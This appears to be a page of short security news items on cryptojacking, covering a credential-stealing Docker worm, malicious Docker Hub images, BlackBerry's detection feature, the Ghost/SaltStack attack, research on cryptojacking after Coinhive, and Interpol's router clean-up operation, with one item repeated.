Security News

A malicious cryptocurrency miner and DDoS worm that has been targeting Docker systems for months now also steals Amazon Web Services credentials. The worm still scans for open Docker APIs, then spins up Docker images and install itself in a new container, but it now also searches for exploitable Kubernetes systems and files containing AWS credentials and configuration details - just in case the compromised systems run on the AWS infrastructure.

A recently identified piece of cryptojacking malware includes functionality that enables its operators to launch distributed denial of service attacks, Palo Alto Networks reports. The malware enables itself with debug privilege and begins operation by launching several threads.

With Docker gaining popularity as a service to package and deploy software applications, malicious actors are taking advantage of the opportunity to target exposed API endpoints and craft malware-infested images to facilitate distributed denial-of-service attacks and mine cryptocurrencies. According to a report published by Palo Alto Networks' Unit 42 threat intelligence team, the purpose of these Docker images is to generate funds by deploying a cryptocurrency miner using Docker containers and leveraging the Docker Hub repository to distribute these images.

BlackBerry announced on Wednesday that the latest release of its Optics endpoint security product now includes a feature designed to protect Intel-based PCs against cryptomining malware. As a result of the collaboration between the two companies, version 2.5.1100 of BlackBerry's Optics product uses a Context Analysis Engine that leverages CPU data from Intel's Threat Detection Technology to detect and block cryptojacking attempts.

BlackBerry has added a new feature to its endpoint detection and response platform Optics: An Intel-powered cryptojacking malware detection system. BlackBerry claims its cryptojacking EDR has "Virtually no processor impact" on Windows 10 systems that Optics runs on, allowing "Organizations [to] detect and mitigate cryptojacking with greater precision and consistent results across all types of workloads."

Hackers targeted the publishing platform Ghost over the weekend, launching a cryptojacking attack against its servers that led to widespread outages. The attack stemmed from the exploit of critical vulnerabilities in SaltStack, used in Ghost's server management infrastructure.

Cryptojacking may not be entirely dead following the shutdown of a notorious cryptomining service, but it isn't very healthy, according to a paper released this week. Coinhive provided Monero cryptomining scripts for use on websites, retaining 30% of the funds for itself.

Since Coinhive's closure last year, cryptojacking has been almost eliminated, according to a group of researchers from the University of Cincinnati in America, and Lakehead University in Canada, because online ads generate more revenue. Though Coinhive's code was marketed as a monetization alternative to advertising, it was quickly abused - a mining script can also be injected into a website by hackers without the site owner's knowledge.

Nearly 16,000 malware-infected MicroTik routers have been scrubbed of Coinhive cryptojacking code thanks to an international police operation. The international law enforcement agency Interpol says it launched Operation Goldfish Alpha in June 2019 to target 20,000 hacked routers in Southeast Asia that were being used to mine for cryptocurrency, as well as to raise awareness in the region of the threat posed by cryptojacking.

Nearly 16,000 malware-infected MicroTik routers have been scrubbed of Coinhive cryptojacking code thanks to an international police operation. The international law enforcement agency Interpol says it launched Operation Goldfish Alpha in June 2019 to target 20,000 hacked routers in Southeast Asia that were being used to mine for cryptocurrency, as well as to raise awareness in the region of the threat posed by cryptojacking.